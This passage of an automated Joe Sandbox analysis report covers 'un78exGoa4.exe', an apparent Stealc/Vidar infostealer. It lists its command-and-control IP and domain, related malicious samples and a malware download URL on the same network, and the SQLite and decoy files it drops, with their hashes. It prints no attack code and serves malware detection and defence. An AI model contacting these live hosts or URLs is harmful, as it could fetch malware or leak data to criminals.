http://www.sqlite.org/copyright.html.	un78exGoa4.exe, 00000000.00000002.426550844.0000000032B34000.00000004.00000020.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.428729273.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.106.175.215	ronaldlitt.top	Russian Federation		50465	IQHOSTRU	true

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	876992
Start date and time:	2023-05-28 09:28:42 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	un78exGoa4.exe
Original Sample Name:	84f304e30439cf1f837ed4f31c1fbb28.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/19@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 90%) Quality average: 70.1% Quality standard deviation: 32.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 56 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.106.175.215	QoBhfr1TgY.exe	Get hash	malicious	Stealc, Vidar	Browse	ronaldlitt.top/25d4fc7fb0cb6b78.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	ronaldlitt.top/25d4fc7fb0cb6b78.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	ronaldlitt.top/25d4fc7fb0cb6b78.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ronaldlitt.top	QoBhfr1TgY.exe	Get hash	malicious	Stealc, Vidar	Browse	193.106.175.215
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	193.106.175.215
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	193.106.175.215
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	45.143.137.71
	Jzi5iET9f4.exe	Get hash	malicious	Stealc, Vidar	Browse	45.143.137.71
	02111599.exe	Get hash	malicious	Stealc, Vidar	Browse	45.143.137.71
	04846099.exe	Get hash	malicious	Stealc, Vidar	Browse	45.143.137.71
	t8Yowuntab.exe	Get hash	malicious	Stealc, Vidar	Browse	176.124.193.136
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.251.88.43

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
IQHOSTRU	QoBhfr1TgY.exe	Get hash	malicious	Stealc, Vidar	Browse	193.106.175.215
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	193.106.175.215
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	193.106.175.215
	file.exe	Get hash	malicious	Tofsee	Browse	193.106.175.92
	J632lU6PQb.exe	Get hash	malicious	RedLine	Browse	193.106.175.220
	Tf5uK0T3bj.exe	Get hash	malicious	Amadey, Lokibot, NSISDropper, RedLine, SystemBC, XWorm, Xmrig	Browse	193.106.175.177
	pax_BT192.js	Get hash	malicious	SmokeLoader	Browse	193.106.175.177
	dIS2G0Y5vE.exe	Get hash	malicious	AgentTesla, Amadey, Lokibot, Raccoon Stealer v2, RedLine	Browse	193.106.175.177
	http://homospoison.ru/one/portable.exe	Get hash	malicious	Unknown	Browse	193.106.175.177
	iC0JlyhS7x.exe	Get hash	malicious	SmokeLoader	Browse	193.106.175.177
	a.exe	Get hash	malicious	Amadey, AveMaria, Nitol, RedLine, Remcos, SmokeLoader, UACMe	Browse	193.106.175.177
	3zI46st6lx.exe	Get hash	malicious	SmokeLoader	Browse	193.106.175.177
	pax_2023_AB1058..js	Get hash	malicious	SmokeLoader	Browse	193.106.175.177
	The__Setup---is__Here---1234.exe	Get hash	malicious	Unknown	Browse	193.106.175.12
	ACTIVATE____SETUP__4695.exe	Get hash	malicious	ClipBanker	Browse	193.106.175.12
	SNq2t7sISp.exe	Get hash	malicious	Phoenix Stealer RedLine	Browse	193.106.175.117
	wkLwbDqVFQ.exe	Get hash	malicious	RedLine SmokeLoader Tofsee	Browse	193.106.175.117
	fWIjsmvPzi.exe	Get hash	malicious	Raccoon RedLine SmokeLoader Tofsee Vidar	Browse	193.106.175.117
	MiA2FZAEJt.exe	Get hash	malicious	Raccoon RedLine SmokeLoader Tofsee Vidar	Browse	193.106.175.117
	VvPRlqqUxb.exe	Get hash	malicious	Raccoon RedLine SmokeLoader Tofsee Vidar	Browse	193.106.175.117

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\BGDAAKJJDAAKFHJKJKFCAEHDAF

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4393511334109407
Encrypted:	false
SSDEEP:	24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
MD5:	8C31C5487A97BBE73711C5E20600C1F6
SHA1:	D4D6B04226D8FFC894749B3963E7DB7068D6D773
SHA-256:	A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
SHA-512:	394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BYIMNPJCRL.xlsx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696849723934257
Encrypted:	false
SSDEEP:	24:9XS3L9Z9achquy916X7oC9YYukwxDMvS7zwUzl9waqHG:hSb9Z9achACukw9Ma73KHG
MD5:	69842C9599BCE04D8727DF49107BEA31
SHA1:	C048464364668A13DD84EAC5E9B765A1D1B00D7A
SHA-256:	32C7FA5D55D3658A65B08F42FEE16884DC5EA6457AB3E6AC50995BC815377134
SHA-512:	AA0DFA923086A78927024585571D55EAA18D7C3C907A80B5DB82396769599717619B1125973479DC848ED352447C6114EB8460B8125F6C47486290884FE26480
Malicious:	false
Preview:	BYIMNPJCRLRBMQEEEUFHTSTCVFQEABUOILZJXSTRKVJYXTSCICYXTUCYTBORUVFEXVHXXHZLPHJNYDQGTPVLWILVQNCPUYBTSIQLWUERWREMYABMDZZQTVDNTDDHAGUUVTCTOOJWFEHSBVTOXXUQRGZNKAYEATNKOEHDUHBLXOYGPQDCOFLMJTHQSYDSBPDURESTXHCQMZBOOMLDWVLKZNKZWNZJSKCJVOCLVGIKQVRJDVKWMRZZTYMEJZFGSYHHXFIVOVJRITSASFJMXNDQBLTKXRYCCLEPTRWCBSLWQQGIZLHEMWQLBCXIJLRDZVGBDMKPQCSAJHPDMQCONOLPJKQSXXWKXLWGWFLLNMOMWBJEMUURYOXEPKNSYCCDIBYHFEDOGZJJRSRKSEMLUDJXBZKLOYRGSOIOLAQQGOKRCRGRTJLWRORHIWNHMGGIWOMOTUTBZAJWLDKALGXBHMLHYLYFZMDYBGWJNWGFVHKCBLXCJPCCAPBVNXOULSIAXANDUOFOTRQEVRFUWUFZCRTHLJQLYEGBPFFBTVSXPLLXDZYMBEAYTIBROCPJVZZSUDJWHANFEHHFHWNIBUHZUDXOLNPGFFLXTLGFZMCQYAGSBHRBITQCSUSVYIHHPNSIDTAQFELFTVTYPAWRKKUYJGRHBOBKCYSQKYEHBXDBGGWIPSQQCYDWZSIIAMYULFQOWVLCWSKUUWOHVIFAGEZJFLQYMCPCCBYXRGJOIZQIOIXSSUJSAMFTHHTCZWSIBUVVURBKAFKXSFMJOWKBXSGIZJARBEJSEPITNOSZGHQXWXOUAERJHEXAIAIJXJBCXQVJCAXHQYYJOOVFEZBKSDJJCTGJPWBAITTSUDYIKNPSTBUYHBNPCEEMIBYEKTOBEZFPKIONTMHFMSRYEGQBWJVYZOPGLWXFVPHCHOVMZAIDRTGJPBLDKIATOXKOSRGCRSMGGORALNTMZEZXSDRSQYSYAIOLFOYGEVJDRGTSRFAUZPOU

C:\ProgramData\CZQKSDDMWR.xlsx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700739677288544
Encrypted:	false
SSDEEP:	24:ppydEKvTSBiqFHi8v+wyNV+fxloGJjN3y5j1xTEC3ugbIvso8wFjas:rmEKvMiYC8Wwyr88GFAH/UvsuZl
MD5:	57582F5B6AE65D8DFCBD4A26382C6138
SHA1:	DC27AD5E54D1BDCCA4EC0D54ED1FB5A3235E9842
SHA-256:	7918D6E76741E42934BB32547E2D7EA395304AEA3383C0E6B7FCF82ACE125749
SHA-512:	6D75F68E608CB12378605F06C74F2F0414486072CC25961A1EA421B94EA5827F92110B902C2190E04AAE2D79152B0AB9B5B1ACECDCAAADD93A6F25028DD1E060
Malicious:	false
Preview:	CZQKSDDMWRVXFLQDZCLIIZCHKUTASMCLXARWUFPBFEESBCKPMBKHTZOAVUSGWGQBPZXNCLVHGKNWOAOTOSOFYOKUZEGHVYFBBGTMFWOOTOTSLTKZBTPTBZMUKYOSGWCRRYGDZWOEMUMCRRCZIEIYJAYGXMDKNOLEIKRXPEZKZGIXGYJYIBDXPZGYVGHMUCSHXXAYXQQNWIVOLMGKTXTGEAEKAOKQQSCTUWFEFQMLQUREMQDBYWFEQOMAJXVXIMMKWJJFKSSTMQZNWPBIQBZROXFYPWCYBVRMKUOGMEJJHYTWCOZYZXVANCHSTYZHRBVSORLGLSOWPDGEBVMQLDWKSLQFPEZDXWPZYNPSNTKGPNKUHFMAEGDWSDLCDNYFQZWURNIMQZDJNJPPOXINSGMUVHRDBWXOXDRPWKGITAKUVBIDIBIWIIANONNQUMKNATQWTVSOUCLOFKCCAISNABSKDPLNCYIQIFQMVEHZLIAFYDDSJJTQSUEVQKACGQHHXCYTZJABESDNXLIPGYKWXJZQWYJMSZUZHKYCGKQIKCYIWZOHAVHKCRNACDVNLPEXUPOQVKBGVFKCQDKJPNALRMAYMZRBAGMTICYZEFMXXYLDXTMKSZLDKSKSRQTDUDGFZXFQEHEDXVFBYBNEOVKFLNIRSTGZDIJXNRZEZFJHNPZDGPGECJTHNVMTSURANVWOVRBTYGZGIPOXWTRIHNKWFKCTXVVKOFHISZVHNVVRXJGJEZEJDSCKNIDUQYQWFNDXBQQJAYENVZXKXVUERYEPFEGNWBAJHHQSAFTHXGXMHUHJVQEYGVKPBTQMWUEZMBBSFENGBBVZIYHLXFRDPALQUURINJMTQGTPGJRGIWXIXWOPVDTWDBDNJJVXOPMTWAGMWQFUPMRROBBTRTOQBMZKPGWTYPWAVOKTSPLMOWJJDVZIIDATCEGNLHPVRONAQJFLFUZXJVRXMCGQNRKTYBRGRMKBPVPQSPFOIOHXGEGDHOJP

C:\ProgramData\DUKNXICOZT.docx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694015263253693
Encrypted:	false
SSDEEP:	24:pE8hRSoFxFv2tFu66PaDs7Wya/4QEssgd8uS:pE8nSoFxFvaCgoWc/gd8L
MD5:	CA67F06C14A077335756DA58259702DC
SHA1:	38A16C7089B83C544B5A58A1A91EE36AB2EE7F38
SHA-256:	6EDC691DABB9C6D794637CB2149341BB454C0490C01BBEF92C3BD48BB86B2329
SHA-512:	1754DE4F4BAC84BD0D0E605157AEFD00599B1641042A3F77AEA16614FE595B7090595C982C1679D910C20A2BF53936BAB648FF31C2CF82F3F9AD985D22EA14E8
Malicious:	false
Preview:	DUKNXICOZTGLPDSRRQNKVCEQUFBSMCGTLOLLPKYXLUAXKQNZYDHXTQPNHHFHJTMIGEVVJMXNTUPFEQSTIPWCYHGFUQMXUYJBEEKJNRRCNFODXCAMAXLAZTIQUNTNPGERBSYITUYWBHPPZHKLUNSGUFMHVRZKTGCTKCZZJDJJKZRDBOFQSLPJQVAUHFJGITHWOZYPLVWBUXHBXXXJUCPJMVLNEPNKDIZKYGMCDARTHGXLNZDXRLUSQRQMRUGCFVVHERGNVXKXGPTCXBJJSYOTZHCRWDCIILVDANNRVWIHRUKXNEWVKZLEBJFPCBFWGQGWGNAHYWNRYILMVTJYSQGDDEIOTQFNFCPBIFXMUECMBHHGKFHGYAPHBDYRWVLPTNZQXENCWRMKRIQEHFZXOHUQUMEVRRXBUGYMSBZKQNTNXORTCHQQTODUBHKLIIDLWFSVAULMVBXACHFRLSBSAGSWTRHIIZFLUSWOCTUGDAHTWKZBYIVQRRYRKRAUTQQLIUHDWFKYDUVNGBMEZUTAFTTKYLQLJJTEVOLXVXBJATRZJRTOISUFLOLZCIBSUKLPDJXJBNUXCGPOLEGGOYZSOMTIWZMXNMUQTDLWGLIFCOJBEBCJQCSUDSWMKJERKRVNPKGTBPKKHLFCUULARSYSMUUYOBVXGHJPZEQKZTIWHIOQYDFCLYHJZKEDUCRZKCLMBUTIQDOHZOSLLXZMPKRTSVSHOIOGCLWGQOYRPDVACEIULCNRQDMRTSTZBWQMCLPDYWEXUCNSMFNSLTBNUAJKDHOPGLEHJPRKNWCKRZSOJXBNVSNBJBRTNVXHVKISJRPDYQBKOXYGOTQXOJKNGSOSFTFSIVNPFOAYLIRBSAREFWQPLONYPUBHJPFGRFFPXAQEEPWYSTOTGMJMHXBQMNEWRCBJRORHQBKISQFFCDYLOWZILZFBCXTYETKBEANFDVZBQHUOSIHHQTXPKVPTCPOPJEEGGSIDPOLYQHTCFCAHOXRL

C:\ProgramData\DUKNXICOZT.xlsx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694015263253693
Encrypted:	false
SSDEEP:	24:pE8hRSoFxFv2tFu66PaDs7Wya/4QEssgd8uS:pE8nSoFxFvaCgoWc/gd8L
MD5:	CA67F06C14A077335756DA58259702DC
SHA1:	38A16C7089B83C544B5A58A1A91EE36AB2EE7F38
SHA-256:	6EDC691DABB9C6D794637CB2149341BB454C0490C01BBEF92C3BD48BB86B2329
SHA-512:	1754DE4F4BAC84BD0D0E605157AEFD00599B1641042A3F77AEA16614FE595B7090595C982C1679D910C20A2BF53936BAB648FF31C2CF82F3F9AD985D22EA14E8
Malicious:	false
Preview:	DUKNXICOZTGLPDSRRQNKVCEQUFBSMCGTLOLLPKYXLUAXKQNZYDHXTQPNHHFHJTMIGEVVJMXNTUPFEQSTIPWCYHGFUQMXUYJBEEKJNRRCNFODXCAMAXLAZTIQUNTNPGERBSYITUYWBHPPZHKLUNSGUFMHVRZKTGCTKCZZJDJJKZRDBOFQSLPJQVAUHFJGITHWOZYPLVWBUXHBXXXJUCPJMVLNEPNKDIZKYGMCDARTHGXLNZDXRLUSQRQMRUGCFVVHERGNVXKXGPTCXBJJSYOTZHCRWDCIILVDANNRVWIHRUKXNEWVKZLEBJFPCBFWGQGWGNAHYWNRYILMVTJYSQGDDEIOTQFNFCPBIFXMUECMBHHGKFHGYAPHBDYRWVLPTNZQXENCWRMKRIQEHFZXOHUQUMEVRRXBUGYMSBZKQNTNXORTCHQQTODUBHKLIIDLWFSVAULMVBXACHFRLSBSAGSWTRHIIZFLUSWOCTUGDAHTWKZBYIVQRRYRKRAUTQQLIUHDWFKYDUVNGBMEZUTAFTTKYLQLJJTEVOLXVXBJATRZJRTOISUFLOLZCIBSUKLPDJXJBNUXCGPOLEGGOYZSOMTIWZMXNMUQTDLWGLIFCOJBEBCJQCSUDSWMKJERKRVNPKGTBPKKHLFCUULARSYSMUUYOBVXGHJPZEQKZTIWHIOQYDFCLYHJZKEDUCRZKCLMBUTIQDOHZOSLLXZMPKRTSVSHOIOGCLWGQOYRPDVACEIULCNRQDMRTSTZBWQMCLPDYWEXUCNSMFNSLTBNUAJKDHOPGLEHJPRKNWCKRZSOJXBNVSNBJBRTNVXHVKISJRPDYQBKOXYGOTQXOJKNGSOSFTFSIVNPFOAYLIRBSAREFWQPLONYPUBHJPFGRFFPXAQEEPWYSTOTGMJMHXBQMNEWRCBJRORHQBKISQFFCDYLOWZILZFBCXTYETKBEANFDVZBQHUOSIHHQTXPKVPTCPOPJEEGGSIDPOLYQHTCFCAHOXRL

C:\ProgramData\FCFIJEBF

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.287139506398081
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
MD5:	292F98D765C8712910776C89ADDE2311
SHA1:	E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
SHA-256:	9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
SHA-512:	205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIGIYTFFYT.docx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\ProgramData\GLTYDMDUST.docx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\ProgramData\GNLQNHOLWB.docx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698695541849584
Encrypted:	false
SSDEEP:	24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
MD5:	64E7020B0B401F75D3061A1917D99E04
SHA1:	785E09A2F76464E26CE282F41DE07D1B27FFB855
SHA-256:	9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
SHA-512:	14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
Malicious:	false
Preview:	GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

C:\ProgramData\HDHCGHDHIDHCBGCBGCAE

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HVLFEFMHHB.xlsx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688192278065048
Encrypted:	false
SSDEEP:	24:QpAScqpJqU2M0r6gHGZdxsLVOo2qf4I5MRduGv:QPtbqE0r4xMZ2qf4X
MD5:	E6B83E7618DE7C60467C035027CADC38
SHA1:	7A0812266C40EAF0F9C8829B49E087AD90D94E9C
SHA-256:	8391D2A7645B06DDB986C1A54E0AED11D95709A36D069D086620E8826BC3A330
SHA-512:	C36C40C23B7859FC2B2F87A8EDFEF247C68BC561BA1482C67EF5581B562A2937B1699325B94D5FEFA6C871E03FFDF15F1A3DB50E4C320FB2AD1E632E0947FDCB
Malicious:	false
